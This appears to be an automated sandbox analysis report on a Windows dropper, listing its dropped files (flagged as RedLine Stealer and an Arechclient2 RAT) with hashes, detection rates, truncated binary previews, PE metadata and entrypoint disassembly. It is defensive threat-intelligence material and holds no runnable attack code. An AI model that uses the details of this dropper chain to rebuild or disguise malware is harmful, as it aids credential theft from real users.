                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):336384
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.453202838334342
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:jjGck+pUZ09BgybSnG+UF5XW1SNYtfvw5ZUDBLL7NVn8yjn5V4d2umdcZyH1IgSw:5k+Zt8PtgSF9VnJrPLdcZGh6hECc
                                                                                                                                                                                                                                                                                      MD5:65A31455A497CAEE44C5AA749C50E40B
                                                                                                                                                                                                                                                                                      SHA1:BE39D07704EFB35BD1503B3914C6DD6C9E6312E8
                                                                                                                                                                                                                                                                                      SHA-256:B94BD24023B0DF0089295B2246546A256D3E82424ECDB0C596B3500525AA4DE0
                                                                                                                                                                                                                                                                                      SHA-512:8FC8D9308FEDE1F2D6B118B6071CE6ED4F86A7CB2442C4C9A9686B772A83961EDA93C81C2C524396688DD1D7B2540D571811AC13CD38FBB72CCD7F6DD06220F9
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.lFA.lFA.lFL..FY.lFL..F9.lFL..Fm.lFH..FF.lFA.mF/.lF.y.F@.lFL..F@.lF.y.F@.lFRichA.lF................PE..L....8.e.....................f......E9............@..........................P.......g.......................................Q..P....0..................................8............................G..@............................................text............................... ..`.rdata.. k.......l..................@..@.data........`.......N..............@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\u3z0.1.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4866096
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                                                                      MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                                                                      SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                                                                      SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                                                                      SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\ypbquxnwo

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):785920
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.809737341976147
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:QiMA0ejRLfxLY8flLb1MgXeXbFAsFWylkkoAbtEIwhsrU:QeDxttLeLFAsFlSjf
                                                                                                                                                                                                                                                                                      MD5:33230F52772BD46C208DFE85537F567F
                                                                                                                                                                                                                                                                                      SHA1:260AAB3C0DD5909C449B62DA56998F8ABD68A235
                                                                                                                                                                                                                                                                                      SHA-256:3F1759A3D89D7B7893BBCDEB180BAB911C960A6D1C80A04BCDA199A8284C36EA
                                                                                                                                                                                                                                                                                      SHA-512:98E3B0337ABD53BA405F76D1FCE17F9EC173C507B3DD3B89A259950AEE744FB337767BC534E817BF1DB7D5B692245DC5A3CF351BED06980DDEE2B0F19A48B10B
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, Author: ditekSHen
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,T............................~.... ........@.. .......................`..............................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............=..............H............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~).....UY.).... .....7...%.....~(.....[Y.)....sr...~).....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~).....SY.)......~).....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1640960
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                                                                      MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                                                                      SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                                                                      SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                                                                      SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2469936
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                                                                      MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                                                                      SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                                                                      SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                                                                      SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\driverRemote_debug\groupware.wav

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20891
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.41735141652497
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
                                                                                                                                                                                                                                                                                      MD5:FCE67E49E191BC3FD22997050C92BA01
                                                                                                                                                                                                                                                                                      SHA1:34C08D6D404A94C2447B671A49731364EA0B47FF
                                                                                                                                                                                                                                                                                      SHA-256:F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
                                                                                                                                                                                                                                                                                      SHA-512:4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.j.yvH.w....F.....m....^.OL`......c.`..Ldqsp.N.....v...\ae].yH.E.`^..d...m.W.U....L......]q..]hbT.Y.TLNcOP`.r.C.Lv.A...V^Fg.dr.i.^..o.GXp.H......yu...xEIAb.LGn_Y.........gjE[...hkhU..A..Adq.QlsO...`Rt..J]..s..u.j.......[lcxNuN.ZoANK..yth]q..t..DL.A`..Q.`_P...x.\..`..I.G.b.Iml.....MVfq.r[sE.HV..a.h.W.d.[QF.N...P.uaFNBdFj.s.W...x...Y...ZJ..x.u.iCyeyv.QxL.O..j.ckOGE^..xSv...^W].S.k\.en.VIuYfSuS...qu...f....K..]f...._.O.O.o.d...m.OArv...Lq....menEX..d..Qf..\FiRd.L.Vu.t.BJ...u.RR.JekI.PDg..g.H....\k..F..LX.a_.m..Bj.brCBh...v.a....ch.D[...G.....D....j.NaelL.F.^a.a.ur.^.tsN..ZH.Io.N.tr.f.exr.D.SNbHIR....]Jb.D.nlu..B.LnY..jp.n...bpmqb...Kc..y.ut.N._m.G.r.c..y.m..]cF.V.F...sMC.yrv..i....O..IAvn.vn..B.A.w.BDF...]M....b.G.XlB.xar..g.q...N..AU.E.Ox....R..k...vaP...S..sQ.....R[O..I.I.dma.T..S.E.y.a.FG...wOk..Q..\U.]..`..x\Z...ps.J..F.....Qf...Z.Pi.L..P.b.\.Tm.P.R.B.PU..d...k..[iS^.TH^N.hjrwwg._....wL....[.I.rt..g.]x..qh[Y.H.xn.N...A..wRF..W.V....jyU.Du.o...p..vO.m.lOTjk.HW.......L.dO....C..bQ.L..i.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\driverRemote_debug\macrospore.indd

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1385173
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.824453259021933
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
                                                                                                                                                                                                                                                                                      MD5:31885BEFE89EAE873D959F47BB548157
                                                                                                                                                                                                                                                                                      SHA1:4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
                                                                                                                                                                                                                                                                                      SHA-256:A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
                                                                                                                                                                                                                                                                                      SHA-512:0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..ZJpL.......C\.bFNR.cgl\..j.......\u...KRCMZ....KY^.L..ap...BbB..J\.qH..o.e....]OZuwL..Nnvv..f.F.fV.T......n..Q....yhai....P.......l........O.sO.dX.RdX...L.i.q..UNub..IJ..C....FH.uq.xn..^Cfs..pb....RUlHfEr`..U....^wcX..Se.uYkc..kb.Z[O..K.F.u.i..pibZ]_O.`....\UJpL.eJ`..ro.xE.mJ]O.R...D.Cft...J..feJ...IuHV.fpvV.xnW.XaN..A..Z.JupSsC..u.N.Gm..j.L..[R.....Yv]U..hrwy.jV...oSK...ffiH..H.RK.gmJw.i.uK..rN.Ei.\PHj...gE...C..dC...u...N._.fYV.e.d.a..M.T....sd.k.....S.w.....R`k......Sd.Kg.i.\.m..p.w.s...]Gx..e^....Q...PBs.\W.e.Xv.....D.a[K].[V.Ku.^Q.s...Gu.d.LO.l.YN...k....QD.\..JN.tUG...OeM.KR..uK.t..V.RB.\.h.h....d.HA.t.i...[.an...y.....``^EiEXul.gUG..uH..Z.nGU....H..O.D...s.P.kmoSk.[ZVvO..X..ae..LqtTN..K.PDn...........]rZOy.V.Mq.bgP....xM..VD__....iup[.\Ma....ty.PKFid..g..nThl..w...ub......o.j.R.e....iuLb.p..wA.].d.f....Ub...mV.Xvv.U.f.E..A..Zv.ZP.d......LVi_...O..nwI\N.F...d..y..j..^C.Hu.Am[Jw.S]ul..d.m[..UQT.Hl..QDC.uZ..Ds.Z..W.X.w..^....ryJi`lj...O...xJ..jNVU.se.c.I.D.....O....P\GW`...Zn.E.x

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1596416
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.466475314379774
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                                                                      MD5:EA945E6BC518D0B25AAC0FCE13AE6E16
                                                                                                                                                                                                                                                                                      SHA1:4144AC69F72190F1AD163A7CC7BD38E18109122C
                                                                                                                                                                                                                                                                                      SHA-256:6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
                                                                                                                                                                                                                                                                                      SHA-512:4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p...............................}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.424444254529849
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:/Svfpi6ceLP/9skLmb0OTcWSPHaJG8nAgeMZMMhA2fX4WABlEnNN0uhiTw:KvloTcW+EZMM6DFyv03w
                                                                                                                                                                                                                                                                                      MD5:D78FCB22F21427D6692C101CD80844C2
                                                                                                                                                                                                                                                                                      SHA1:5723BC3CB25FF9496D30F644FA14D196F726EBCD
                                                                                                                                                                                                                                                                                      SHA-256:347355EF4381E7D0E9B197452202F0D07B3C2DACE5C235336F2619E4E1C97E40
                                                                                                                                                                                                                                                                                      SHA-512:67E50061C9CE351B014B6B5F6BC4631B56FD3B6B026380B57E6DF3A589670FB817ECA1D0BAFDDD851E72CC7083CBA79ED099A938B6DC00FBB85E415F7ED2E68B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.5..O.............................................................................................................................................................................................................................................................................................................................................../j..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.080953506811968
                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                      File name:4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      File size:485'377 bytes
                                                                                                                                                                                                                                                                                      MD5:71ef0fb3be89dc92fcbe7a6e8e6d6ee8
                                                                                                                                                                                                                                                                                      SHA1:07b90b69d37fceed0e01a9eab109e62652d9c39d
                                                                                                                                                                                                                                                                                      SHA256:a464f8ca48e3193c3c58bec992d90875712d87a0165c24568e0b09c700364154
                                                                                                                                                                                                                                                                                      SHA512:cfcc9444f5f35ed3904955d3d24fe9d9ab3ce975fbdd62adb0035cf3e148f4a7c079b4b9305d89cd62c5e9528a1cfc621fcf15d5e7efa68417c24bfdfdb4a91a
                                                                                                                                                                                                                                                                                      SSDEEP:6144:dYGgupEJ12YQcP55RYd85n4roeyk5FNP0Pz1BHF+hzxYaE1ccl:dYGgupEJ1brP5si5Iyk5wXQYnBl
                                                                                                                                                                                                                                                                                      TLSH:2DA4C00372F0AC60E5622A319F2BB69C669FFD51DE11572B2E08610F66703E0F6A375D
                                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.lFA.lFA.lFL..FY.lFL..F9.lFL..Fm.lFH..FF.lFA.mF/.lF.y.F@.lFL..F@.lF.y.F@.lFRichA.lF................PE..L.....sd...........

                                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                                      Icon Hash:492951455555510d

                                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Entrypoint:0x403945
                                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                      Time Stamp:0x6473CDB1 [Sun May 28 21:54:57 2023 UTC]
                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                      Import Hash:c9619f19f41ef1b7d232f47cfbcc330b

                                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                      call 00007F65558AF412h
                                                                                                                                                                                                                                                                                      jmp 00007F65558AB395h
                                                                                                                                                                                                                                                                                      push 00000014h
                                                                                                                                                                                                                                                                                      push 00414DE8h
                                                                                                                                                                                                                                                                                      call 00007F65558ABFBAh
                                                                                                                                                                                                                                                                                      call 00007F65558ADB2Bh
                                                                                                                                                                                                                                                                                      movzx esi, ax
                                                                                                                                                                                                                                                                                      push 00000002h
                                                                                                                                                                                                                                                                                      call 00007F65558AF3A5h
                                                                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                                                                      mov eax, 00005A4Dh
                                                                                                                                                                                                                                                                                      cmp word ptr [00400000h], ax
                                                                                                                                                                                                                                                                                      je 00007F65558AB396h
                                                                                                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                                                                                                      jmp 00007F65558AB3C5h
                                                                                                                                                                                                                                                                                      mov eax, dword ptr [0040003Ch]
                                                                                                                                                                                                                                                                                      cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                                                                                                                                                      jne 00007F65558AB37Dh
                                                                                                                                                                                                                                                                                      mov ecx, 0000010Bh
                                                                                                                                                                                                                                                                                      cmp word ptr [eax+00400018h], cx
                                                                                                                                                                                                                                                                                      jne 00007F65558AB36Fh
                                                                                                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                                                                                                      cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                                                                                                                                                      jbe 00007F65558AB39Bh
                                                                                                                                                                                                                                                                                      cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                                                                                                                                                      setne bl
                                                                                                                                                                                                                                                                                      mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                                                                                                                                      call 00007F65558ABE3Ch
                                                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                                                      jne 00007F65558AB39Ah
                                                                                                                                                                                                                                                                                      push 0000001Ch
                                                                                                                                                                                                                                                                                      call 00007F65558AB471h
                                                                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                                                                      call 00007F65558AEFA3h
                                                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                                                      jne 00007F65558AB39Ah
                                                                                                                                                                                                                                                                                      push 00000010h
                                                                                                                                                                                                                                                                                      call 00007F65558AB460h
                                                                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                                                                      call 00007F65558AD874h
                                                                                                                                                                                                                                                                                      and dword ptr [ebp-04h], 00000000h
